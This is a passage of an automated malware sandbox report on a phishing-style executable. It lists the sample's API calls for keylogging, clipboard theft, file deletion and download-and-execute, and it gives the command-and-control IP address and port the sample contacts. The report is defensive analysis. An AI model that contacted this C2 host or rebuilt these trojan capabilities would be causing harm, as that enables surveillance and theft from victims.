@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,13_2_0040BC9B
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_00403183 wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$all13_2_00403183
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_0040F234 SetFileAttributesA,FindFirstFileA,FindNextFileA,RemoveDirectoryA,SetFileAttributesA,DeleteFileA,GetLastError,FindClose,RemoveDirectoryA,FindClose,13_2_0040F234
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_00405AFB Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindNextFileA,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,13_2_00405AFB
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_0040A71E ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,atoi,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,URLDownloadToFileA,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,ShellExecuteA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c13_2_0040A71E
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_004057B6 Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindNextFileA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,13_2_004057B6
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_0040BEA2 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,atoi,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?13_2_0040BEA2
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeCode function: 4x nop then jmp 023C4FB8h0_2_023C52C5
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 4x nop then jmp 048A4280h9_2_048A458D

            Networking

            barindex
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: 62.102.148.166
            Source: global trafficTCP traffic: 192.168.2.9:49707 -> 62.102.148.166:3319
            Source: Joe Sandbox ViewIP Address: 62.102.148.166 62.102.148.166
            Source: Joe Sandbox ViewASN Name: TEKNIKBYRANSE TEKNIKBYRANSE
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_0040221C ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,malloc,recv,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,free,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,13_2_0040221C
            Source: e-Payment.NET.CMS4006975815.exe, 00000000.00000002.1409996431.00000000026D1000.00000004.00000800.00020000.00000000.sdmp, JXHPwNYzysUjKo.exe, 00000009.00000002.1444552308.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Contains functionality to capture and log keystrokes
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: [Esc] 13_2_004043BF
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: [Enter] 13_2_004043BF
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: [Tab] 13_2_004043BF
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: [Down] 13_2_004043BF
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: [Right] 13_2_004043BF
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: [Up] 13_2_004043BF
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: [Left] 13_2_004043BF
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: [End] 13_2_004043BF
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: [F2] 13_2_004043BF
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: [F1] 13_2_004043BF
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: [Del] 13_2_004043BF
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: [Del] 13_2_004043BF
            Contains functionality to register a low level keyboard hook
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_00403877 SetWindowsHookExA 0000000D,0040385C,0000000013_2_00403877
            Installs a global keyboard hook
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_004050FC OpenClipboard,GetClipboardData,CloseClipboard,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,13_2_004050FC
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_0040A71E ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,atoi,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,URLDownloadToFileA,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,ShellExecuteA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c13_2_0040A71E
